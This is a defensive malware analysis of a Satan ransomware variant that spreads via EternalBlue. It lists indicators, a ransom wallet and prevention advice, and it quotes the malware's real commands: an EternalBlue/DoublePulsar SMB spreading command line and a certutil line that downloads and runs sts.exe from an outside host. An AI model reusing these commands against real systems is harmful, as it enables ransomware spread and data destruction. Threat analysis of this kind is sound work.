Satan ransomware itself has been around since January 2017. In this analyze the new version of the infamous Satan ransomware, which since November 2017 has been using the ExternalBlue exploit to spread via the network, and consequently encrypt files.
First up is a file inconspicuously named “sts.exe”, which may refer to “Satan spreader”.
The file is packed with PECompact 2, and is therefore only 30KB in filesize.
Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.
“sts.exe” acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:
Figure 1: Download and extract two new files
Both files will be downloaded from 198.55.107[.]149, and use a custom User-Agent “RookIE/1.0“, which seems a rather unique User-Agent.
- ms.exe has password: iamsatancryptor
- client.exe has password: abcdefghijklmn
It appears the Satan ransomware developers showcase some sense of humor by using the password “iamsatancryptor”.
Once the user has executed “sts.exe”, they will get the following UAC prompt, if enabled:
Figure 2: UAC prompt
Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named “Cryptor.exe”. Figure 2 shows the command line options.
Curiously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed – this means we need to click through to install the ransomware. Even more curious: the setup is in Chinese.
Figure 3: End of setup screen
ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit – it does not appear to use its own.
The infection of other machines on the network will be achieved with the following command:
cmd /c cd /D C:\Users\Alluse~1\&blue.exe –TargetIp & star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload down64.dll –TargetIp
We can then see an attempt to spread the ransomware to other machine in the same network:
Figure 4 – Spreading attempt over SMB, port 445
down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be injected in rundll32.exe by using DoublePulsar, and executes the following command:
cmd.exe /c certutil.exe -urlcache -split -f http://184.108.40.206/cab/sts.exe c:/sts.exe&c:\sts.exe
This will be used for planting sts.exe on other machines in the network, and will consequently be executed.
Satan ransomware itself, which is contained in Client.exe, and will be dropped to C:\Cryptor.exe. This payload is also packed with PECompact 2. As usual, any database-related services and processes, which it does to also encrypt those files possibly in use by another process.
Figure 5 – Database-related processes
What’s new in this version of Satan, is that the exclusion list has changed slightly – it will not encrypt files with the following words in its path:
windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user
This exclusion list is reminiscent of Iron ransomware.
Satan will, after encryption, automatically open the following ransomware note: C:\_How_to_decrypt_files.txt:
Figure 6 – Ransom note
The note is, as usual, in English, Chinese and Korean, and demands the user to pay 0.3 BTC. Satan will prepend filenames with its email address, email@example.com, and append extensions with .satan. For example: [firstname.lastname@example.org]Desert.jpg.satan
BTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo
It appears one person has already paid 0.2 BTC:
Satan will create a unique mutex, SATANAPP, so the ransomware won’t run twice. It will also generate a unique hardware ID and sends this to the C2 server:
GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1Connection: Keep-AliveUser-Agent: Winnet ClientHost: 220.127.116.11
As mentioned in the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017 last year. For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works similar to what is posted in this blog. It would fetch the following files:
According to VirusTotal, the downloader file was uploaded:
2017-11-20 18:35:17 UTC ( 5 months ago )
For additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.
You may want to verify if any of the following files or folders exist:
- Enable Windows Update, and install them (especially verify if MS17-010 is installed)
- Install an antivirus, and keep it up-to-date and running
- Restrict, where possible, access to shares (ACLs)
- Create backups! (and test them)
More ransomware prevention can be found here.
Satan is not the first ransomware to use EternalBlue (for example, WannaCry), however, it does appear the developers of Satan are continuously improving and adding features to its ransomware.
Prevention is always better than disinfection/decryption.
The information contained in this website is for general information purposes only. The information is gathered from Security Boulevard while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.